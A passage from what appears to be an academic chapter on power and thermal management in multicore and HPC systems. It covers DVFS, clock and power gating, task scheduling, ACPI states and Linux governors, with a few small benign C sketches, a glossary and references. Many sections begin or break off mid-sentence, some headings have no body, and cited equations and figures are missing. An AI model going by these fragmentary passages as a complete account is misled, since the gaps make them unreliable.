$$E_{supply} = \int_{0}^{\infty} C_L V_{DD}\,\frac{dV}{dt}\,dt = C_L V_{DD}^{2} \qquad (4)$$

$$E_{stored} = \int_{0}^{\infty} C_L V(t)\,\frac{dV}{dt}\,dt = \frac{1}{2} C_L V_{DD}^{2} \qquad (5)$$
It can be noted that while half of the supplied energy is stored in the capacitor,
the other half is dissipated as heat in the PMOS. Similarly, during discharging, the
stored energy in the capacitor is dissipated in the Negative channel Metal Oxide
Semiconductor (NMOS). The power dissipation during such switching of the load
constitutes a major component of the total power dissipated in the system. The
various power dissipation mechanisms are categorized as follows:
• Static dissipation: Static power is consumed even when the nodes are not
switching. This occurs primarily due to leakage current mechanisms and any
contention current in the circuit. Subthreshold leakage is usually the dominant
contributor to the leakage current (and power) and refers to the current flowing
through a transistor even when it is OFF. A potential difference between the
source and drain terminals causes the subthreshold leakage current through
the channel. Similarly, tunneling of the carriers through the dielectric between
the gate terminal and the channel results in the gate leakage current. Other
leakage mechanisms include junction leakage, gate-induced drain leakage (GIDL), and punchthrough (Kim
et al. 2003). Additionally, some non-CMOS circuits, such as pseudo-nMOS gates,
current-mode logic, and many analog circuits, draw current even while quiescent.
Such contention current may contribute to the static power dissipation. The total
power dissipation can be estimated as shown in Eq. 8.
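For context, the standard CMOS power model that the surrounding discussion draws on can be summarized as follows (a textbook-standard restatement, not the chapter's verbatim equations; $\alpha$ is the switching activity factor and $I_{leak}$ the total leakage current):

$$P_{switching} = \alpha\, C_L V_{DD}^{2} f, \qquad P_{static} = V_{DD} \times I_{leak}, \qquad P_{total} = P_{switching} + P_{static}$$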
The power dissipation mechanisms discussed above have been adversely affected
by the continuous quest for higher performance through transistor scaling and archi-
tectural innovations. Increasing the operating clock frequency has been one of the
primary methods of achieving faster computations. However, as shown in Eq. 6, this
results in higher switching power. Consequently, scaling down of the supply voltage,
along with reduced gate dimensions, had been used to maintain the power density
of the ICs. However, since the failure of Dennard scaling (Dennard et al. 1974),
such an approach has proved insufficient. Consequently, some power management
techniques focus on managing the clock frequency based on the application’s
performance requirements. Similarly, since the clock tree forms the highest activity
net in the design, adaptive disabling of the clock network forms an effective power
management method (clock gating). Similar to dynamic dissipation, the static power
dissipation has also increased considerably with technology scaling (Agarwal et al.
2004). For instance, reducing the supply voltage and the corresponding threshold
voltage, Vth , in order to reduce power density, can lead to an exponential increase of
the subthreshold leakage current. Similarly, the gate leakage current due to direct
tunnelling increases exponentially with the reduction in the dielectric thickness
and the increase in potential drop across the oxide. Therefore, unlike in earlier
technologies (>65 nm), reducing the static power dissipation is equally important as
dynamic power. Further, in systems that employ bursts of activity amid longer idle
periods, managing the static power assumes higher priority. As a result, methods
such as power gating and multiple power-down levels, which selectively disable
power supply to multiple domains of the system, are being used extensively in power
management.
The increasing power dissipation has an adverse impact on other quality metrics
of the system. The higher energy consumption results in reduced usability of
portable systems and increased operating costs in HPC systems. Further, the
increased power density and higher temperatures increase the demand for cooling
solutions along with possible reduced performance due to thermal throttling (Bhat
et al. 2019). Additionally, higher temperatures exacerbate the reliability problems
of electronic systems. As a result, additional optimization objectives of lifetime
and functional reliability need to be considered during the DSE for power man-
agement (Sahoo et al. 2021b).
similar scheduling, but it can utilize the runtime operating conditions, such as
temperature, to enable better decision-making. However, design/compile-time DSE
allows for more thorough exploration by using complex optimization methods.
Hybrid DSE attempts to combine the best of both the approaches by deriving DSE
models during design/compile time that can be used at runtime, along with dynamic
operation scenario information to provide effective power management.
Hardware
and thermal issues due to the increased power per area. Consequently, thermal-
aware 3D microarchitecture design using thermal herding techniques is being
used (Puttaswamy and Loh 2007). Other core-level hardware methods involve
dynamic reconfiguration of the cores to lower the power dissipation. Kontorinis
et al. (2009), Rodrigues et al. (2011), and Narayanan et al. (2010) propose methods
for adaptively changing the core configuration to provide the best PPW under
varying workloads. Power management techniques for memory usually involve
innovations in the memory hierarchy design or methods to selectively power down
memory/storage components. Smart caches and drowsy caches (Flautner et al. 2002)
rely on predicting cache with low leakage hardware and putting cache lines into
low-power mode, respectively. Similarly, intelligent methods for putting portions
of the Dynamic Random Access Memory (DRAM) into low-power mode have been
proposed. A detailed survey of power management in DRAM can be found in Mittal
(2012). Power management of the interconnect network usually involves an adaptive
selection of routing algorithms and the reduction of the length of the interconnect
wire segment (Kumar et al. 2005).
Firmware
where V, f, Isub, and CL are the voltage, frequency, subthreshold leakage current,
and load capacitance, respectively. Here, the voltage value limits the maximum
frequency. Equation 11 shows the relation between the supply voltage and the frequency
(Kim et al. 2017; Pagani et al. 2018):

$$f = \beta\,\frac{(V - V_{th})^{2}}{V} \qquad (11)$$

where β and Vth are a technology-related constant and the threshold voltage,
respectively. Therefore, decreasing the supply voltage decreases the operational
frequency, which can vary between a minimum and a maximum bound (Das et al. 2013,
2014a; Ranjbar et al. 2019, 2021); a numerical illustration of Eq. 11 is given after this
list of techniques. As an example, employing the DVFS technique
in Ranjbar et al. (2019) reduced the energy consumption by 24% on average,
compared to other recent works.
• Clock Gating (Stop and Go): This is a method of controlling the clock signals to stop
and restart dynamic operations, which cause dynamic power consumption. The
clock signals feed the computation units, such as the processors, and the
connected memories, such as registers and caches. Therefore, by stopping the clock
signals and putting some (distributed policy) or all (global policy) processors
into sleep mode, less dynamic power is consumed by the processors and memories.
This method can be applied when the power consumption is high, and the cores are switched back
to active mode when the thermal emergency is over. Some recent works (Munawar
et al. 2014; Ranjbar et al. 2021) have used this technique to manage
power consumption by dynamically controlling the sleep cycles of the cores,
which helps to keep the peak power of the chip under the Thermal Design Power
(TDP) and, therefore, maintain it within thermally sound operating conditions.
• Power Gating: This refers to switching off the computational processors and their
connected memories and communication parts when not in use, to
reduce both static and dynamic power consumption. However, frequent on and
off switching may cause additional energy overheads. Therefore, power gating
is best used when the overall power consumption needs to be reduced
significantly.
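As a rough numerical illustration of Eq. 11 (with an assumed threshold voltage $V_{th} = 0.3\,\mathrm{V}$; the constant $\beta$ cancels out), lowering the supply from 1.2 V to 0.8 V gives:

$$\frac{f(0.8\,\mathrm{V})}{f(1.2\,\mathrm{V})} = \frac{(0.8-0.3)^{2}/0.8}{(1.2-0.3)^{2}/1.2} = \frac{0.3125}{0.675} \approx 0.46$$

so the attainable frequency roughly halves, while the dynamic power, which scales with $V^{2} f$, drops by about $1 - (0.8^{2} \times 0.3125)/(1.2^{2} \times 0.675) \approx 79\%$.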
Virtualization
Virtualization is a method employed in data centers to increase the utilization of
computing resources. It involves deploying multiple Virtual Machines
(VMs) on the same physical server to improve the overall utilization of resources
– processor cycles or memory space – that might otherwise lie idle if the server were used
by a single user. Modern server management tools, such as Microsoft System Center,
can recommend VM migrations that allow some physical servers to be
powered down.
Software
Task Migration
Task migration is the runtime movement of a task/application from a hot processor core
to another, i.e., remapping and rescheduling it on a colder processor core to
let the hot core cool down. This process helps in dynamically reducing
and balancing the temperature or power consumption across all processor cores in a
platform (Sheikh and Pasha 2018; Henkel and Dutt 2021). This technique is mainly
applied in heterogeneous multicore platforms, in which the processor cores consume
different amounts of power. A minimal sketch of the core-selection step follows.
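The sketch below assumes per-core temperature readings are available in an array; the names are illustrative:

int coldest_core(const float temp[], int num_cores)
{
    int target = 0;
    for (int c = 1; c < num_cores; c++)
        if (temp[c] < temp[target])   // migrate the task to the coldest core
            target = c;
    return target;
}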
Task Scheduling
Task scheduling is the process of selecting a task from an application/task set and
determining where (i.e., on which core) and when to execute it (Sheikh and Pasha
2018). Choosing a processor core from the list of available cores helps to
reduce power consumption, especially in heterogeneous multicore platforms. The
task scheduling process can be static or dynamic, with the aim of power reduction. In
static task scheduling, the task data are known in advance. Thus, the scheduling
decision (on which processor core, and at which time instants, to start each
task’s execution) can be made at design time to reduce power
consumption. In dynamic task scheduling, the start times of tasks and their
locations are decided at runtime. Therefore, the scheduler can change the task
execution order to reduce power consumption. In addition, the scheduler can
suspend a running task during its execution, or first schedule a task with a low
workload, if there is high power consumption or a thermal emergency. The previously
scheduled task can be resumed when the thermal crisis is over.
Data Forwarding
Data forwarding is a method used to reduce the power dissipation caused by frequent
data accesses to the L1 cache. Modern multicore systems have a large amount of
resources dedicated to reducing memory latency in the form of caches, and the power
Energy Minimization
of data (Singh et al. 2016b; Das et al. 2013, 2014a). Therefore, selecting an appropriate
application task mapping can significantly reduce the task communication energy
and migration overhead. In particular, using a minimum number of cores (e.g.,
by power gating most of the cores) to map dependent tasks onto the same core or
neighboring cores is an approach to minimizing energy consumption.
• Memory: Memories consume significant energy in embedded systems. Low-
power techniques such as clock gating and DVFS can be applied to memories as
well to reduce energy consumption (Salehi and Ejlali 2014). The leakage power
of memories such as Static Random Access Memory (SRAM) is high due to
the additional transistors in each cell (Shafique et al. 2015). Therefore,
the voltage level of memories can be scaled down to reduce the leakage power
and, consequently, the energy consumption of memories. Besides, clock gating
can help to reduce the energy overhead of reading from and writing to
memory. It helps by (1) managing the access and locations of bits and (2)
generating appropriate signals to adapt the data at the read and write memory
ports (Shafique et al. 2015).
Among the different types of memories, ScratchPad Memories (SPMs) are more energy-
efficient than SRAMs and caches. Since using low-energy memory is desirable
for embedded systems, SPM is used as on-chip memory. Although its
static power consumption is high, its read and write access times are very
low compared to other memories like SRAMs, which leads to low energy
consumption (Shekarisaz et al. 2021).
Thermal Management
Fig. 7 Impact of varying the voltage level on cores’ temperatures (in Kelvin) (Das et al. 2014b). Each of the four panels plots the temperature of core i against its voltage (0.8–1.2 V) for reference voltages Vr from 0.8 V to 1.2 V, under the configurations (a) Vn = Vw = Vs = 0, Ve = Vr; (b) Vn = Vw = 0, Vs = Ve = Vr; (c) Vn = 0, Vw = Vs = Ve = Vr; and (d) Vn = Vw = Vs = Ve = Vr
Fig. 8 Impact of considering a TDP constraint on the system’s maximum temperature through the use
of the power-gating technique. (a) Power traces for the two methods of Ranjbar et al. (2022) and Medina
et al. (2018). (b) Temperature profile of the Ranjbar et al. (2022) method. (c) Temperature profile of the Medina et al.
(2018) method
Fig. 9 The relation between cores’ temperature and power consumption for the methods of Medina
et al. (2018) and Ranjbar et al. (2021) using the DVFS technique. (a) Power trace of the
big cluster. (b) Temperature trace of A15-core2. (c) Temperature trace of A15-core3
Reliability Improvement
In addition, NBTI can degrade the lifetime of caches as well. Balancing the aging of
memory cells in terms of energy consumption leads to a longer lifetime (Shafique
et al. 2015). Besides, reducing the leakage power by controlling the threshold
voltage is a technique that can manage NBTI (Gnad et al. 2015).
• Functional Reliability: The output correctness of tasks should be investigated
across the whole chip, including computations, memories, and communications.
Soft Error Rate (SER) management is an approach to managing the functional
reliability of the computation parts. The SER is the probability of soft errors occurring
during a time interval, and it depends on the operating frequency (Ma et al.
2018, 2019); increasing the core frequency is effective in reducing the
SER. Therefore, DVFS is one of the low-power techniques for managing functional
reliability. Munawar et al. (2014) explore the impact of V-f scaling on
functional and thermal reliability. They show that the fault rate increases at
low frequencies, which degrades functional reliability (Sahoo
et al. 2021a). Figure 11 depicts the impact of applying different frequency
levels on the fault rate and functional reliability for an application. The fault
rate is computed with Eq. 12, taken from Das et al. (2014c),
where λ0, d, f, and fmin are the soft error rate at the maximum frequency level, an
architecture-specific constant, the frequency level, and the minimum frequency level,
respectively. However, thermal reliability (i.e., the lifetime reliability that is
influenced by temperature variation) decreases at high frequency levels, which
is in contrast to functional reliability optimization. The thermal reliability at time
instance t due to EM is given by Eq. 13 below, where n, E, Ea, β, and
k are a material-based constant, the energy consumption, the activation energy, the Weibull
slope parameter, and the Boltzmann constant, respectively (Dinakarrao et al. 2019).
The power consumption and temperature are higher at high frequencies,
which decreases thermal reliability according to Eq. 13. Therefore,
selecting the optimum voltage and frequency levels is crucial. In addition,
Fig. 11 Impact of varying frequency levels on fault rates and functional reliability
power gating can help to improve the SER by reducing the total utilization of the cores
and gating off the unused ones.
$$\lambda(f) = \lambda_0 \times 10^{\frac{d\,(1-f)}{1-f_{min}}} \qquad (12)$$

$$R_{thermal}(t) = e^{-C \times t^{\beta}}, \qquad C = \left(\frac{1}{\Gamma \times (1+\frac{1}{\beta}) \times E^{-n} \times e^{\frac{E_a}{k \times Temp}}}\right)^{\beta} \qquad (13)$$
Increasing power consumption may raise the Bit Error Rate
(BER) of the communication parts and, consequently, cause unreliable packet transmis-
sion. Therefore, considering a power budget and selecting the optimum route
for data transfers improves the BER and enables reliable packet transmission (Brahim
and Khan 2006). In memories, low leakage power consumption leads to reliable
read and write operations. Compared to Non-Volatile Memories (NVMs), most
SRAM-based architectures have high leakage power consumption and low
reliability. Therefore, a nonvolatile SRAM storage element (i.e., a
memory architecture) with low leakage power can reduce these reliability issues.
To manage the leakage power when Phase Change Memory (PCM) (one of the most
promising resistive NVMs) is used in a memory architecture, power gating can be
applied to idle PCM cells, which then draw no leakage power (Huang et al.
2014).
Fig. 12 Breakdown of system power consumption with various workloads, CPU speeds, and display
brightness levels (Mahesri and Vardhan 2005)
ACPI Standard
From the experiment referred to above, it follows that energy efficiency in the case of
user-centric desktop computers requires the DPM and DVFS techniques described ear-
lier in subsections “Dynamic Power Management (DPM)” and “Dynamic Voltage
and Frequency Scaling (DVFS).” Consequently, modern CPUs used in desktop and
server computers follow the OS-based Advanced Configuration and Power Interface
(ACPI) standard (https://uefi.org/). This standard defines mechanisms for putting the
desktop computer as a whole in and out of system sleep states. However, regarding
the subject of this chapter, the most crucial part is the ACPI section entitled “Processor
Configuration and Control”, which describes the configuration and control of the
processor’s power and performance states.
In ACPI, C0 is defined as the operating state of a processor, whereas C1, C2,
and C3 are the halt, stop-clock, and sleep states, respectively. Additional C-states
have been introduced by several chip vendors, such as C6 in Intel Xeon, which is
known as deep power conservation state. The Haswell processors can enter C7, a
deep power down state, whereas even lower power dissipation is achievable in the
deeper power down states labelled as C8/C9/C10 in the 8th and 9th generation of
Intel Core processor families and Intel Xeon E processor families.
While running in the operating state C0, a core can be in one of the predetermined
power-performance states known as P-states, which select the DVFS level. Reduced
performance and lower energy dissipation are characteristics of P-states with higher
indices. Various parameters supplied by monitoring infrastructure tools and services,
such as infrastructure utilization or the latency between input and output timestamps,
can be used to make an informed decision on voltage scaling.
In the presence of DVFS facilities, selecting a core for a task becomes a
more difficult problem, even for multicores with a homogeneous architecture, since
their cores can function at varied voltage and frequency levels at the same time
instant. Scheduling policies that consider the various voltage and frequency levels
are referred to as voltage scheduling.
In a multicore CPU, a task can be assigned to a core statically or dynamically.
The former is recommended when the workload is known ahead of time, whereas
dynamic allocation, which occurs after a task is released, is the only option
for workloads that are not known in advance. Dynamic task mapping on CPUs
that enable DVFS is even more difficult, because not only must the target core
be selected but also the voltage level. The scheduling methods in
Windows or Linux (from kernel version 2.6) that use dynamic frequency scaling
for contemporary multicore processors from Intel (SpeedStep technology) and
AMD (PowerNow! or Cool’n’Quiet technology) are good examples of this type
of allocation.
In contemporary operating systems used in desktops and servers, the available
power schemes for CPUs are termed governors. In Linux, the performance governor
runs the CPU at the maximum frequency, whereas the powersave governor activates
the minimum frequency. In the case of a high load, the ondemand governor selects
P0 immediately, whereas the conservative governor progressively modifies the
current P-state. The purpose of these last two heuristics is to keep CPU utilization
near 90% by reactively decreasing or raising the frequency with particular heuristics.
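For example, a governor can be selected for CPU 0 from a C program through the standard Linux cpufreq sysfs interface (a sketch; the path is the conventional one and writing to it typically requires root privileges):

#include <stdio.h>

int set_governor(const char* governor)   /* e.g., "performance", "ondemand" */
{
    FILE* f = fopen("/sys/devices/system/cpu/cpu0/cpufreq/scaling_governor", "w");
    if (!f) return -1;                   /* cpufreq absent or no permission */
    fprintf(f, "%s\n", governor);
    fclose(f);
    return 0;
}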
The governor proposed in Ayoub et al. (2011), after being implemented in the
Linux kernel and tested on a 32 nm Intel hexa-core dual-socket Westmere Xeon,
managed to reduce the standard deviation from the target performance by more than
90% over state-of-the-art policies, while reducing the average power by 17% when
applied to the Spec2K and SpecWeb benchmarks.
Custom governors can be per-core or per-chip (chip-wide). In Kim et al.
(2008), an interesting comparison of per-chip and per-core DVFS is shown,
according to which per-core DVFS saves roughly 20% more energy than standard
chip-wide DVFS using off-chip regulators. Despite such improvement potential,
per-core DVFS has not been implemented widely in hardware. For example, the
active cores even in the third generation of Intel x86 processors (Ivy Bridge) had to
work at the same frequency and voltage in steady states, whereas their competing
cores in AMD processors could operate at various frequencies, but still with a
single voltage value, required by the core in the fastest P-state. The fourth-generation Intel
x86 CPUs (Haswell) were the first to offer per-core DVFS capability in
production. This support was removed from the later Skylake and Kaby
Lake generations. The authors of Acun et al. (2019) adopted a fine-grained, function-level, per-
core DVFS technique to construct an intelligent energy-efficient runtime module.
Over the initial iterations, the module discovers the energy-optimal frequency for
each function of the analyzed application and then uses that optimal frequency in
subsequent iterations. On Haswell CPUs, they achieved a 4% to 35%
energy reduction over chip-level DVFS while maintaining performance (Acun et al.
2019).
In Zhu et al. (2020), the authors explored the relationship between per-core DVFS
and phase scaling of the voltage regulator (VR) to achieve system-level energy
optimization. The proposed convex-optimization model is split into offline
and online stages, which reduces the optimization time without incurring energy
overhead. The model was tested on platforms with four, eight, and
sixteen cores, where it lowered the system energy usage by up to 22.4% with
good scalability on the testing data.
Power Management: High-Performance Computing (HPC) Data Centers

An HPC data center connects a set of nodes (servers) (Singh et al. 2015b), where
each node contains a set of cores within a chip; the cores communicate via
an interconnection network, and the nodes communicate via a high-speed network,
for example, InfiniBand. The size and performance of these systems continue to
increase, but at the expense of high energy consumption. Therefore, it is important
to take measures that can help reduce this energy consumption.
Energy is consumed to execute queued jobs that arrive periodically or randomly.
Data center operators make a profit by executing jobs that have values associated
with them, where a job's value is typically assigned based on the expected profit
earned from its completion. The scheduling of jobs is therefore influenced by their
value: the resource manager tries to maximize profit by allocating the limited
resources to the highest-value jobs in the queue. However, with the rise in
power/energy consumed by data centers, resource management also needs to take
energy into account.
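As a simple illustration of value-driven allocation, the C sketch below greedily assigns a limited pool of cores to the highest-value jobs in the queue. The Job structure, the job mix, and the single-shot greedy policy are hypothetical simplifications of what a real resource manager would implement.

/* Hypothetical sketch: greedily allocate a limited pool of cores to the
 * highest-value queued jobs, ignoring arrival times, deadlines, and energy. */
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    const char *name;
    int cores_needed;  /* resources requested by the job */
    double value;      /* expected profit from completing the job */
} Job;

static int by_value_desc(const void *a, const void *b) {
    double va = ((const Job *)a)->value, vb = ((const Job *)b)->value;
    return (va < vb) - (va > vb);  /* sort in decreasing order of value */
}

int main(void) {
    Job queue[] = {
        {"render", 8, 120.0}, {"batch", 4, 90.0},
        {"backup", 2, 10.0},  {"analytics", 8, 200.0},
    };
    int n = sizeof(queue) / sizeof(queue[0]);
    int free_cores = 16;
    double profit = 0.0;

    qsort(queue, n, sizeof(Job), by_value_desc);
    for (int i = 0; i < n; i++) {
        if (queue[i].cores_needed <= free_cores) {
            free_cores -= queue[i].cores_needed;
            profit += queue[i].value;
            printf("scheduled %s\n", queue[i].name);
        }
    }
    printf("total value: %.1f, idle cores: %d\n", profit, free_cores);
    return 0;
}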
The literature offers many techniques to improve the energy efficiency of data
centers. The most popular are based on Dynamic Power Management (DPM)
and Dynamic Voltage Frequency Scaling (DVFS) principles. Recently, virtual
machine (VM) consolidation, which reduces the number of servers needed to run
VMs, has become a major focus area (Sun et al. 2015).
To achieve energy efficiency and/or high profit, existing approaches apply a
variety of techniques, for example, (1) fast heuristics to quickly find practical
allocations for the dynamically arriving jobs as they reduce the delay in allocations,
(2) design-time profiling to reduce runtime computational complexity (Singh et al.
2015b), (3) machine learning, and (4) novel data center network (DCN) tech-
nologies, leveraging emerging interconnection paradigms such as millimeter-wave
(mmWave) interconnects, Ethernet and wireless. The details of these techniques are
as follows.
Fast Heuristics
Using the results of design-time profiling in the runtime resource management
process has led to better joint optimization of both profit and energy, as heavy
computations are shifted to design time (Singh et al. 2015b). These approaches
enable fast decisions at runtime and have thus helped in developing the fast runtime
heuristics mentioned in the previous subsection. Further, design-time profiling has
helped in adapting allocations during tasks’ execution (Singh et al. 2016a).
Although design-time profiling has shown promising results, it is not flexible
to all varying situations, as it profiles only a set of situations and assumes that
the resources required by jobs in the system deviate little from them. To overcome
this disadvantage, algorithms that account for varying situations can be designed
by taking a full history of job information into account in real time. This has led
to the development of various machine learning approaches.
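The design-time profiling approach described above can be sketched in C as follows: profiling fills a small table of precomputed configurations at design time, and the runtime manager replaces heavy online optimization with a cheap table lookup. The scenario descriptor and the table contents are purely illustrative.

/* Hypothetical sketch: design-time profiling precomputes good allocations
 * for a small set of expected scenarios; at runtime, allocation reduces to
 * a cheap table lookup instead of a heavy online optimization. */
#include <stdio.h>

typedef struct {
    int active_jobs;      /* scenario descriptor (illustrative) */
    int cores_to_enable;  /* allocation precomputed at design time */
    int frequency_mhz;    /* DVFS setting precomputed at design time */
} ProfiledConfig;

static const ProfiledConfig table[] = {
    {1, 2, 1200}, {2, 4, 1600}, {4, 8, 2000}, {8, 16, 2400},
};

/* Pick the closest profiled scenario that covers the current load. */
static const ProfiledConfig *lookup(int active_jobs) {
    for (unsigned i = 0; i < sizeof(table) / sizeof(table[0]); i++)
        if (active_jobs <= table[i].active_jobs)
            return &table[i];
    return &table[sizeof(table) / sizeof(table[0]) - 1];  /* saturate */
}

int main(void) {
    const ProfiledConfig *c = lookup(3);
    printf("enable %d cores at %d MHz\n", c->cores_to_enable, c->frequency_mhz);
    return 0;
}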
Machine Learning
Network Technologies
Since the network consumes a significant amount of energy, novel data center
network (DCN) technologies have been explored to reduce energy consumption.
Millimeter-wave (mmWave) interconnects have been proposed to reduce the power
consumption of networking equipment. Most of these works target wireless data
centers and propose interconnecting entire racks of servers as units with 60 GHz
wireless links. Alternatively, server-centric wireless DCNs, where direct wireless
links are used for server-to-server communication, have also been explored
(Mamun 2021). These wireless data center architectures are a promising alternative
to traditional wired architectures for achieving further reductions in the power
consumption of HPC systems.
2.5D/3D Systems
Cross-Layer Approach
Traditional DSE for power management – both at compile time and at runtime
– involved optimizing the methods for a single abstraction layer. In contrast,
a cross-layer approach involves joint optimization across multiple layers. For
instance, Sahoo and Kumar (2021a) present joint optimization of the choices for
DVFS and for multiple implementations of a task with varying activity factors.
However, joint exploration also results in an explosion of the related design space.
As a result, novel approaches to searching for optimal design points are being
adopted in cross-layer DSE for power and other quality metrics (Carter et al. 2010;
Sahoo et al. 2016). These include constrained decoding (Sahoo and Kumar 2021a),
Multi-Objective Evolutionary Algorithms (MOEA) (Sahoo et al. 2019, 2020), and
Monte Carlo Tree Search (MCTS) (Sahoo and Kumar 2021b), among others.
Emerging Technologies
The last decade has seen a rapid proliferation of electronic systems across
application areas, powered by various emerging technologies in both devices and
applications. Emerging application domains such as edge AI and the Internet of
Things (IoT) have been driven mainly by rapid strides in the field of AI/ML and
have their own unique set of power-management challenges, such as battery-less
edge devices and computation/communication trade-offs for IoT. Further, Artificial
Intelligence (AI) algorithms such as Deep Neural Networks (DNNs) require simpler
computations but far more memory accesses than traditional computation tasks.
Hence, the power management of noncore and uncore components has become
equally critical. Emerging device technologies, in turn, are driven by the need to
reduce leakage power at shrinking transistor dimensions.
Conclusion
With the perpetual quest for high performance and the resulting technology scaling,
power management has become one of the primary system-level design objectives.
With the recent proliferation of AI/ML into every sphere of our lives, and the need
for high-performance systems to execute the related applications, multicore systems
will need to scale across multiple dimensions – number of cores, heterogeneity
of cores, microarchitecture, packaging, etc. Implementing both traditional and
emerging applications on multicore systems that vary across these aspects provides
ample scope for innovation in power management. To this end, this chapter has
provided an overview of the fundamental aspects, the state of the art, and a peek
into the future of power management in multicore systems.
Glossary
AI Artificial Intelligence.
ALU Arithmetic Logic Unit.
BER Bit Error Rate.
CMOS Complementary Metal-Oxide Semiconductor.
DFS Dynamic Frequency Scaling.
DNN Deep Neural Networks.
DPM Dynamic Power Management.
DRAM Dynamic Random Access Memory.
DSE Design Space Exploration.
DSPs Digital Signal Processing blocks.
DTM Dynamic Thermal Management.
DVFS Dynamic Voltage and Frequency Scaling.
DVS Dynamic Voltage Scaling.
EM Electromigration.
FPGA Field-Programmable Gate Array.
GPU Graphics Processing Unit.
HPC High Performance Computing.
IC Integrated Circuit.
IoT Internet of Things.
IP Intellectual Property.
IPC Instructions Per Cycle.
LSQ Load Store Queue.
MCTS Monte Carlo Tree Search.
MOEA Multi-Objective Evolutionary Algorithms.
NBTI Negative Bias Temperature Instability.
NMOS Negative channel Metal Oxide Semiconductor.
NVM Non Volatile Memory.
OS Operating System.
PCM Phase Change Memory.
PMC Performance Monitoring Counters.
PMOS Positive channel Metal Oxide Semiconductor.
PPW Performance Per Watt.
RTL Register Transfer Level.
SER Soft Error Rate.
SPM ScratchPad Memory.
SRAM Static Random Access Memory.
TC Thermal Cycling.
TDDB Time Dependent Dielectric Breakdown.
TDP Thermal Design Power.
TLP Thread Level Parallelism.
VMs Virtual Machines.
References
Acun B, Chandrasekar K, Kale LV (2019) Fine-grained energy efficiency using per-core DVFS
with an adaptive runtime system. In: 2019 Tenth International Green and Sustainable Computing
Conference (IGSC), pp 1–8. https://doi.org/10.1109/IGSC48788.2019.8957174
Agarwal A, Kim CH, Mukhopadhyay S, Roy K (2004) Leakage in nano-scale technologies:
mechanisms, impact and design considerations. In: Proceedings of the 41st Annual Design
Automation Conference, DAC’04. Association for Computing Machinery, New York, pp 6–11.
https://doi.org/10.1145/996566.996571
Al Faruque M, Jahn J, Ebi T, Henkel J (2010) Runtime thermal management using software agents
for multi-and many-core architectures. IEEE Des Test Comput 27(6):58–68
Amrouch H, Ebi T, Schneider J, Parameswaran S, Henkel J (2013) Analyzing the thermal
hotspots in FPGA-based embedded systems. In: 2013 23rd International Conference on Field
Programmable Logic and Applications. IEEE, pp 1–4
Aroca RV, Gonçalves LMG (2012) Towards green data centers: a comparison of x86
and ARM architectures power efficiency. J Parallel Distrib Comput 72(12):1770–1780.
https://doi.org/10.1016/j.jpdc.2012.08.005, https://www.sciencedirect.com/science/article/pii/
S0743731512002122
Ayoub RZ, Ogras U, Gorbatov E, Jin Y, Kam T, Diefenbaugh P, Rosing T (2011) OS-level power
minimization under tight performance constraints in general purpose systems. In: Proceedings
of the 17th IEEE/ACM International Symposium on Low-Power Electronics and Design,
ISLPED ’11. IEEE Press, Fukuoka, Japan, pp 321–326. https://doi.org/10.1109/ISLPED.2011.
5993657
Bansal N, Pruhs KR (2010) Server scheduling to balance priorities, fairness, and average quality
of service. SIAM J Comput 39(7):3311–3335
Bhat G, Gumussoy S, Ogras UY (2019) Power and thermal analysis of commercial mobile plat-
forms: experiments and case studies. In: 2019 Design, Automation Test in Europe Conference
Exhibition (DATE), pp 144–149. https://doi.org/10.23919/DATE.2019.8714831
Binkert N, Beckmann B, Black G, Reinhardt SK, Saidi A, Basu A, Hestness J, Hower DR,
Krishna T, Sardashti S, Sen R, Sewell K, Shoaib M, Vaish N, Hill MD, Wood DA (2011) The
gem5 simulator. SIGARCH Comput Archit News 39(2):1–7. https://doi.org/10.1145/2024716.
2024718
Brahim GB, Khan B (2006) Budgeting power: packet duplication and bit error rate reduction in
wireless ad-hoc networks. In: Proceedings of the 2006 International Conference on Wireless
Communications and Mobile Computing, pp 293–298
Carazo P, Apolloni R, Castro F, Chaver D, Pinuel L, Tirado F (2010) L1 data cache power
reduction using a forwarding predictor. In: Proceedings of the 20th International Conference
on Integrated Circuit and System Design: Power and Timing Modeling, Optimization and
Simulation, PATMOS’10. Springer, Berlin/Heidelberg, pp 116–125
Carter NP, Naeimi H, Gardner DS (2010) Design techniques for cross-layer resilience. In: 2010
Design, Automation Test in Europe Conference Exhibition (DATE 2010), pp 1023–1028.
https://doi.org/10.1109/DATE.2010.5456960
Chantem T, Hu XS, Dick RP (2010) Temperature-aware scheduling and assignment for hard real-
time applications on MPSoCs. IEEE Trans Very Large Scale Integr (VLSI) Syst 19(10):1884–
1897
Cox M, Singh AK, Kumar A, Corporaal H (2013) Thermal-aware mapping of streaming
applications on 3D multi-processor systems. In: Proceedings of IEEE Symposium on Embed-
ded Systems for Real-time Multimedia, pp 11–20. https://doi.org/10.1109/ESTIMedia.2013.
6704498
Das A, Kumar A, Veeravalli B (2013) Communication and migration energy aware design space
exploration for multicore systems with intermittent faults. In: 2013 Design, Automation Test
in Europe Conference Exhibition (DATE), pp 1631–1636. https://doi.org/10.7873/DATE.2013.
331
Das A, Kumar A, Veeravalli B (2014a) Energy-aware task mapping and scheduling for reliable
embedded computing systems. ACM Trans Embed Comput Syst (TECS) 13(2s):1–27
Das A, Kumar A, Veeravalli B (2014b) Temperature aware energy-reliability trade-offs for
mapping of throughput-constrained applications on multimedia MPSoCs. In: 2014 Design,
Automation & Test in Europe Conference & Exhibition (DATE). IEEE, pp 1–6
Das A, Kumar A, Veeravalli B, Bolchini C, Miele A (2014c) Combined DVFS and mapping
exploration for lifetime and soft-error susceptibility improvement in MPSoCs. In: Proceedings
on Design, Automation & Test in Europe Conference & Exhibition (DATE), pp 1–6. https://doi.
org/10.7873/DATE.2014.074
Das A, Shafik RA, Merrett GV, Al-Hashimi BM, Kumar A, Veeravalli B (2014d) Reinforcement
learning-based inter-and intra-application thermal optimization for lifetime improvement of
multicore systems. In: Proceedings of the 51st Annual Design Automation Conference, pp 1–6
Das A, Kumar A, Veeravalli B (2015a) Reliability and energy-aware mapping and scheduling of
multimedia applications on multiprocessor systems. IEEE Trans Parallel Distrib Syst (TPDS)
27(3):869–884
Das A, Kumar A, Veeravalli B, Shafik R, Merrett G, Al-Hashimi B (2015b) Workload uncertainty
characterization and adaptive frequency scaling for energy minimization of embedded systems.
In: Proceedings of Design, Automation & Test in Europe Conference & Exhibition (DATE).
IEEE, pp 43–48
Das AK, Kumar A, Veeravalli B, Catthoor F (2018) Introduction. Springer International Publish-
ing, Cham, pp 1–21. https://doi.org/10.1007/978-3-319-69374-3_1
